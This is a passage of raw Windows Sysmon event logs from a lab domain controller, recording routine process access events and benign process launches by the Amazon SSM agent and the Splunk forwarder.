13:53:22.727{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\combase.dll+a7962|C:\Windows\System32\combase.dll+a828e|C:\Windows\System32\combase.dll+a804f|C:\Windows\System32\combase.dll+46808|C:\Windows\System32\combase.dll+46420|C:\Windows\System32\combase.dll+54157|C:\Windows\System32\combase.dll+c1b04|C:\Windows\System32\combase.dll+521d1|C:\Windows\System32\combase.dll+52720|C:\Windows\System32\combase.dll+1fca|C:\Windows\System32\RPCRT4.dll+d97da|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x80000000000000001996Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.716{10ACEC4A-8552-5FCF-4E00-000000009101}25762152C:\Windows\system32\conhost.exe{10ACEC4A-8552-5FCF-4D00-000000009101}3888C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001995Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.716{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8552-5FCF-4E00-000000009101}2576C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001994Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.714{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001993Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.714{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001992Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.714{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001991Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.714{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001990Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.713{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001989Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.713{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001988Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.713{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001987Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.713{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001986Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.713{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001985Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.713{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8552-5FCF-4D00-000000009101}3888C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001984Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.712{10ACEC4A-8551-5FCF-3000-000000009101}15483788C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe{10ACEC4A-8551-5FCF-3C00-000000009101}3888C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe+5b01e 154100x80000000000000001983Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.713{10ACEC4A-8552-5FCF-4D00-000000009101}3888C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic OS get OperatingSystemSKU /format:listC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" 10341000x80000000000000001982Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8552-5FCF-4C00-000000009101}3988C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001981Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001980Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001979Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001978Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001977Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001976Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001975Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001974Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8552-5FCF-4C00-000000009101}3988C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001973Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001972Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001971Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8552-5FCF-4B00-000000009101}39843980C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{10ACEC4A-8552-5FCF-4C00-000000009101}3988C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001970Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.520{10ACEC4A-8552-5FCF-4C00-000000009101}3988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-8552-5FCF-4B00-000000009101}3984C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000001969Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8552-5FCF-4B00-000000009101}3984C:\Program 